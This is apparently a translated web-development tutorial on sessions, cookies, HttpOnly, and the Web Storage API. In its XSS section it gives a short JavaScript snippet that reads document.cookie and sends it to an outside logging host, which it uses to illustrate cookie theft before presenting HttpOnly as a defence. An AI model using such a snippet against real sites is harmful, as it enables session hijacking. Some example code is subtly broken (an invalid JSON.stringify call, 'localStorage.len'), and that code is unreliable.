What is Session?

In the field of computer science, and especially in networking, session is a persistent network protocol that creates an association between the user (or user agent) side and the server side, thus serving as a mechanism for exchanging packets, and session is a very important part of network protocols (e.g. telnet or FTP). In transport protocols that do not contain a session layer (e.g. UDP) or that do not reside for long periods of time (e.g. HTTP), the maintenance of the session relies on high-level procedures in the transport data.

The session mechanism is a server-side mechanism where the server uses a structure similar to a hash table (or possibly a hash table) to store information. When the program needs to create a session for a client request, the server first checks whether the client request already contains a session identifier (called session id), if it does, it means that the session has been created for this client before, and the server will retrieve the session according to the session id. If the client request does not contain a session id, a session is created for this client and a session id associated with this session is generated, the value of the session id should be a string that will not be repeated and not easily found to imitate the law, the session id will be returned to the client in this response to save.

A cookie is a small piece of text that the server stores on the local machine and sends to the same server with each request.IETF RFC 2965 HTTP State Management Mechanism is the generic cookie specification. Specifically the cookie mechanism uses a scheme for maintaining state on the client side. It is a mechanism for storing session state on the user side. cookies are an effort to address the shortcomings of the HTTP protocol in terms of statelessness. The web server sends cookies to the client with HTTP headers, and at the client’s end, the browser parses these cookies and saves them as a local file, which automatically ties any request from the same server to these cookies.

The distribution of orthodox cookies is achieved by extending the HTTP protocol, where the server prompts the browser to generate a cookie by adding a special line in the HTTP response header. The use of cookies is automatically sent to the server by the browser in the background according to certain principles. The browser checks all stored cookies, and if the scope of a cookie is greater than the location of the resource to be requested, it attaches the cookie to the HTTP request header of the requested resource and sends it to the server.

The content of a cookie consists of a name, a value, an expiration time, a path and a domain. The path and domain together constitute the scope of the cookie. If no expiration time is set, it means that the cookie lives for the duration of the browser session, and the cookie disappears when the browser window is closed. Session cookies are generally not stored on the hard disk but in memory, although this behavior is not regulated by the specification. If an expiration time is set, the browser saves the cookie to the hard disk and when the browser is closed and opened again, these cookies remain valid until the set expiration time is exceeded. Cookies stored on the hard disk can be shared between different browser processes, such as two IE windows. For cookies that are stored in memory, different browsers have different ways of handling them.

The session mechanism uses a solution that maintains state on the server side. At the same time, we also see that the session mechanism may need to use the cookie mechanism for the purpose of saving the identity since the server-side solution of keeping state on the client side also needs to save an identity. And session provides a convenient way to manage global variables .

The session is specific to each user and the value of the variable is stored on the server with a sessionID to distinguish which user session variable is being used, this value is returned to the server through the user’s browser at the time of access, when the client disables cookies, this value may also be set to be returned to the server by get.

Due to the statelessness of http, sessions and cookies emerge in order to enable all pages under a certain domain to share certain data. The flow of a client accessing the server is as follows

  • First, the client sends an http request to the server side.
  • The server side accepts the client request, creates a session, and sends an http response to the client, which has a response header, which contains the Set-Cookie header. This header contains the sessionId. set-Cookie format is as follows.

Set-Cookie: value[; expires=date][; domain=domain][; path=path][; secure]

  • In the second request initiated by the client, if the server gives a set-Cookie, the browser will automatically add the cookie to the request header
  • The server receives the request, decomposes the cookie, validates the information, and returns the response to the client after a successful check

Caution.

  • cookie is only one of the options to implement session. Although it is the most commonly used, it is not the only method. There are other ways to store cookies after disabling them, such as putting them in a url
  • Nowadays, most of them are Session + Cookie, but using only session without cookie, or using only cookie without session can theoretically maintain the session state. But in practice, for many reasons, it is not usually used alone
  • Using session only needs to save an id on the client side, in fact, a lot of data is saved on the server side. If all cookies are used, there is not that much space on the client side when there is a large amount of data.
  • If you only use cookies and not session, then all the account information is saved on the client side, once it is hijacked, all the information will be leaked. And the amount of data on the client side becomes larger, the amount of data transmitted by the network will also become larger

Http is a stateless protocol, and in order to pass information between sessions, it is inevitable that cookies are used to mark the state of the visitor. As soon as this cookie is obtained, it is possible to obtain someone’s identity and hack into a personal account or website.

For websites, once an xss vulnerability exists, it means that an intruder can execute arbitrary JS scripts in the browser, and it becomes very easy to obtain cookies, which are stored in the document object of the browser and can be used to read the cookies in order to have the identity of other people. A very simple xss attack statement is as follows.

1
2
3
4
url = document.top.location.href;
cookie = document.cookie;
c = new Image();
c.src = "http://www.xss-log-server.com/c.php?c="+cookie+"&u="+url;

Some websites take this problem into consideration, so they adopt browser binding technology, such as binding cookies to the browser’s User-agent, so that if changes are found, the cookie is considered invalid. But this method has great disadvantages, because when the intruder steals the cookie, he must have obtained the User-agent at the same time. For example, the ADSL at home is changing one IP address every time we connect.

Then how can we secure our sensitive cookies? Microsoft Internet Explorer version 6 Service Pack 1 and higher supports the cookie attribute Http- The Http-Only parameter is the same as other parameters such as domain, once Http-Only is set, you will not see the cookie in the browser’s document object. Cookie, and the browser is not affected when browsing, because the cookie will be placed in the browser header sent out (including ajax time), the application will not generally operate in js these sensitive cookies, for some sensitive cookies I can use Http-Only, for some need to operate in the site with js We do not set the cookie, so that the security of the cookie information also ensures the basic functionality of the site.

The following example is how to set Http-Only (note that the HttpOnly attribute is not case-sensitive).

1
Set-Cookie: <name>=<value>[; <name>=<value>] [; expires=<date>][; domain=<domain_name>][; path=<some_path>][; secure][; HttpOnly]

The current mainstream browsers have basically supported the Http-Only property.

First-party cookies and third-party cookies

Cookies can usually be divided into two categories, first-party cookies and third-party cookies. First-party cookies and third-party cookies, are small pieces of data that a website stores on the client. They are both stored by a certain domain and can only be accessed by that domain. The difference between them is not really a technical difference, but a difference in the way they are used. For example, if you visit the website www.a.com, which sets a cookie, this cookie can only be read by the pages under the domain www.a.com, which is a first-party cookie. The browser sets a cookie when www.b.com requests the image, then this cookie can only be accessed by www.b.com this domain, but not by www.a.com this domain, because for us, we are actually visiting www.a.com this website was A cookie under the domain www.b.com is set, so it’s called a third-party cookie.

Application of first-party cookies and third-party cookies at the time of data statistics.

  • First-party Cookies: The biggest advantage of first-party cookies is their high acceptance rate. In addition to the setting of not accepting cookies at all, first-party cookies are accepted by users in other cases. Therefore, if there are no special requirements, the use of first-party cookies will be more accurate than third-party cookies, and the data we get through analysis tools will be more accurate.
  • Third-party Cookie: The acceptance rate of third-party cookies is not as high as that of first-party cookies (although mainstream browsers accept third-party cookies with the P3P protocol by default, and the acceptance rate can reach 90% or even more than 95%), but in some specific cases it is possible to achieve functions that cannot be achieved by first-party cookies. For example, when we have websites with multiple domains that need to be tracked, we want to know that a user clicked on an ad to reach a page under domain A, then may have visited a page under whatever domain, and finally completed the registration at a page under domain B. The ad could be placed on a page under domain A, and the registration could be completed at a page under domain B. The ad can be tracked on the page under domain A, and the registration can be tracked on the page under domain B. If we use first-party cookies, we will create a cookie for domain A and another cookie for domain B. They can be associated with the actions on the pages under their respective domains, but they cannot be associated. If we use third-party cookies, then no matter how many domains, there is only one cookie, a cookie belonging to the third-party domain, and all domains under the website can share this cookie, then all behaviors can be associated and analyzed.

For obtaining data through script-based web analytics tools.

  • Cookie is a must, we can’t analyze anything without it
  • First-party cookies have a high acceptance rate and are more accurate, so use them if you have no special needs
  • Third-party cookies can be tracked across domains, special needs can be applied

Cookies and special characters

This is a story that happened to myself, due to a special character set in the cookie value, resulting in some phones generating a 5xx error when opening the site due to compatibility issues, after analyzing the character in the cookie is not supported by some Android phone models.

Why does such a situation occur? Let’s take a look at some notes on the use of cookies.

Cookie compatibility issues

There are 2 different versions of the cookie format. The first version, which we call Cookie Version 0, was originally developed by Netscape, and is also supported by almost all browsers. The newer version, Cookie Version 1, is based on the RFC 2109 document.

The character limit for the content of the same cookie varies for different cookie versions. In Cookie Version 0, certain special characters, such as spaces, square brackets, parentheses, equal sign (=), comma, double quotes, slash, question mark, @ symbol, colon, and semicolon cannot be used as the content of a cookie. Although these characters are allowed in the Cookie Version 1, the new version of the Cookie specification is still not supported by all browsers, so to be on the safe side, we should try to avoid using these characters in the content of the cookie.

The specification developed by RFC 2109.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
4.1  Syntax:  General

   The two state management headers, Set-Cookie and Cookie, have common
   syntactic properties involving attribute-value pairs.  The following
   grammar uses the notation, and tokens DIGIT (decimal digits) and
   token (informally, a sequence of non-special, non-white space
   characters) from the HTTP/1.1 specification [RFC 2068] to describe
   their syntax.

   av-pairs        =       av-pair *(";" av-pair)
   av-pair         =       attr ["=" value]        ; optional value
   attr            =       token
   value           =       word
   word            =       token | quoted-string

   Attributes (names) (attr) are case-insensitive.  White space is
   permitted between tokens.  Note that while the above syntax
   description shows value as optional, most attrs require them.

   NOTE: The syntax above allows whitespace between the attribute and
   the = sign.

RFC 2068 developed specifications.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
Many HTTP/1.1 header field values consist of words separated by LWS
   or special characters. These special characters MUST be in a quoted
   string to be used within a parameter value.

          token          = 1*<any CHAR except CTLs or tspecials>

          tspecials      = "(" | ")" | "<" | ">" | "@"
                         | "," | ";" | ":" | "\" | <">
                         | "/" | "[" | "]" | "?" | "="
                         | "{" | "}" | SP | HT

As a word of advice, never store special characters in cookies, and if necessary, encode them for later use.

LocalStorage and sessionStorage

Web Storage in html5 includes two types of storage: sessionStorage and localStorage. sessionStorage is used to store data in a session locally, which can only be accessed by pages in the same session, and is destroyed when the session ends. localStorage is used to store data under a domain that needs to be stored permanently locally and can be accessed until the data is deleted. So the main difference between sessionStorage and localStorage is the lifecycle of the data they store. sessionStorage stores data for a session, while localStorage stores data for a permanent lifecycle until it is actively deleted, otherwise the data never expires.

Similarities, differences, advantages and disadvantages of Web Storage and cookies

Web Storage and cookies have a lot in common.

  • They can both be used to store user data
  • They both store data in the form of strings
  • The data they store is limited in size

Web Storage and cookies also have differences.

  • They have different lifecycles. sessionStorage has a session lifecycle, localStorage has a permanent lifecycle, cookies have a customizable lifecycle, cookies can set an expiration time, and data can be accessed before the expiration time.
  • They have different storage size limits. Most modern browsers have a storage size limit of 5M for storage and 4K for cookies.
  • Different browser support and different API calls.

The advantages of Web Storage are that it has more storage space and can store more content than cookies. cookies are sent to the server with each request, whereas Web Storage is not sent to the server with the request data and uses less bandwidth. The disadvantage is that all browsers now support cookie operations, while only current browsers support Web Storage operations, so if you need to be compatible with older browsers, you can’t use Web Storage.

Web Storage API

localStorage and sessionStorage have a unified API interface, which provides a great convenience for the operation of both. The following is an example of how to use the API interface for localStorage, which is also applicable to sessionStorage.

Add key-value pairs

localStorage.setItem(key, value)setItem is used to store the value value to the key key, in addition to using setItem, you can also use localStorage.key = value or localStorage[‘key ‘] = value. Another thing to note is that the key and value values must be in the form of strings, if they are not strings, their corresponding toString() methods will be called to convert them to strings and then stored. When we want to store the object, it should be converted to a string format that we can recognize (such as JSON format) before storing it.

1
2
3
4
5
6
// 把一个用户名(lilei)存储到 name 的键上
localStorage.setItem('name', 'lilei');
// localStorage.name = 'lilei';
// localStorage['name'] = 'lilei';
// 把一个用户存储到user的键上
localStorage.setItem('user', JSON.stringify(id:1, name:'lilei'));

Get the key value

localStorage.getItem(key)getItem is used to get the data corresponding to the key key. Like setItem, getItem has two equivalent forms value = localStorage.key and value = localStorage[‘key ‘]. The value obtained is a string type, if you need another type, you have to do a manual type conversion.

1
2
3
4
5
6
// 获取存储到 name 的键上的值
var name = localStorage.getItem('name');
// var name = localStorage.name;
// var name = localStorage['name'];
// 获取存储到user的键上的值
var user = JSON.parse(localStorage.getItem('user'));

Delete key-value pairs

localStorage.removeItem(key)removeItem is used to remove the item with the specified key. localStorage does not have the concept of data expiration, all data needs to be manually removed by the developer if it is invalid.

1
2
3
4
var name = localStorage.getItem('name'); // 'lilei'
// 删除存储到 name 的键上的值
localStorage.removeItem('name');
name = localStorage.getItem('name'); // null

Clear all key-value pairs

localStorage.clear() clear is used to delete all the stored content, it differs from removeItem in that removeItem removes one item, while clear removes all.

1
2
3
// 清除 localStorage
localStorage.clear();
var len = localStorage.length; // 0

Get the localStorage property name (key name)

localStorage.key(index)key method is used to get the key name of the specified index. The key method can be used to iterate over the keys stored in localStorage.

1
2
3
4
5
localStorage.setItem('name','lilei');
var key = localStorage.key(0); // 'name'
localStorage.setItem('age', 10);
key = localStorage.key(0); // 'age'
key = localStorage.key(1); // 'name'

Get the number of key-value pairs stored in localStorage

The localStorage.lengthlength property is used to get the number of key-value pairs in localStorage.

1
2
3
4
localStorage.setItem('name','lilei');
var len = localStorage.len; // 1
localStorage.setItem('age', 10);
len = localStorage.len; // 2

Web Storage events

The storage event is triggered when the stored data changes. However, note that unlike click-like events that capture and bubble events, the storage event is more like a notification and cannot be cancelled. The storage event is triggered by the storage event of other windows in the same domain, but the window that triggered storage (i.e., the current window) does not trigger this event.

  • oldValue: the value before the update. If the key is newly added, this property is null.
  • newValue: the value after the update. If the key was deleted, this property is null.
  • url: the url of the page that originally triggered the storage event.
  • key: the key name of the storage store
1
2
3
4
5
function storageChanged() {
    console.log(arguments);
}

window.addEventListener('storage', storageChanged, false);

Web Storage Application Scenarios

Since every HTTP request carries cookie information, cookies are of course streamlined as much as possible, and one of the more common application scenarios is to determine whether a user is logged in. For users who have logged in, the server will insert an encrypted unique identifier for a single user into the cookie when he logs in, and the next time we can read this value to determine whether the current user is logged in.

With an intuitive understanding of these differences, we can discuss the application scenarios of the three.

Due to the characteristics of Web Storage, it is mainly used to store some infrequently changed and insensitive data, such as the national province, city and county information. It can also store some less important user-related data, such as user’s avatar address, theme color, shopping cart data, etc. This information can be stored in the user’s local copy first for quick presentation, and then change the avatar address and theme color after it is really read successfully from the server side. In addition, based on the storage event feature, Web Storage can also be used for communication between different windows in the same domain.

Reference links.